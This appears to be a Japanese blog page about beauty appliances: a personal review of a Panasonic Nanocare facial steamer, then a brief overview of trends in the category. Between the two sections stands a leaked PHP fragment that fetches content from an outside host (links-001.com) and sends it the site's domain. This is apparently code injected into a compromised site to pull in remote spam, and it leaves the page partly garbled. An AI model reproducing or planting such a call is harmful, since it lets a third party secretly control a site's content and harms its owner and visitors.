前へ
次へ

翌朝の肌の調子が良くなる美容家電

年齢的なこともあり、乾燥で肌のたるみ・ゆるみを感じていたのですが、エステに行く時間も余裕もありません。
家でプチ美容ができる、お手軽な家電が何かないかしらと思っていました。
ネットで調べて、美容家電パナソニックナノケアスチーマーを購入。
最初のタイプです。
お風呂上りや寝る前に20分ほど、顔にスチーマーをあてます。
とても気持ちが良く、肌がふっくらなめらかになる感じです。
またほっこり温まるせいか、眠りにつきやすくなるのです。
翌朝の肌の感じがピンと張っているので、しばらく続けていました。
でも面倒なのか、普段は押入れに眠ってしまっています。
寒くなってきて肌の乾燥を感じると、また押入れからこの美容家電を出してきて、思い出したように家エステを始めます。
化粧のりが違うので、続けられればいいと思います。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

美容家電の現在の動向

現在、様々なメーカーから美容に関する家電が発売されています。
一言に美容家電と言っても多種多様なものがあります。
ドライヤーやシェーバー、電動歯ブラシなどの以前からあったものが進化したり、美顔スチームや洗顔機など新しいカテゴリーのものがあります。
ドライヤーは以前からありましたが、発展したものはマイナスイオンを発生させ髪を潤わせたり、センサーを内蔵しドライヤーの風の温度を自動で調整してくれる物もあります。
この様に古くからあり一般的になったものを進歩させています。
洗顔機といわれるものは、普通は手であわ立てる洗顔料を機械で泡立て、機械の振動で洗顔するものです。
これにより人間の手では難しい毛穴の奥の方まできれいにすることが出来ます。
こういったものはいままでなかったと思います。
どちらのタイプでも、高級化が進んでいるようです。
この背景にあるのは、個人の美への関心が高まっているからだと思われます。

Page Top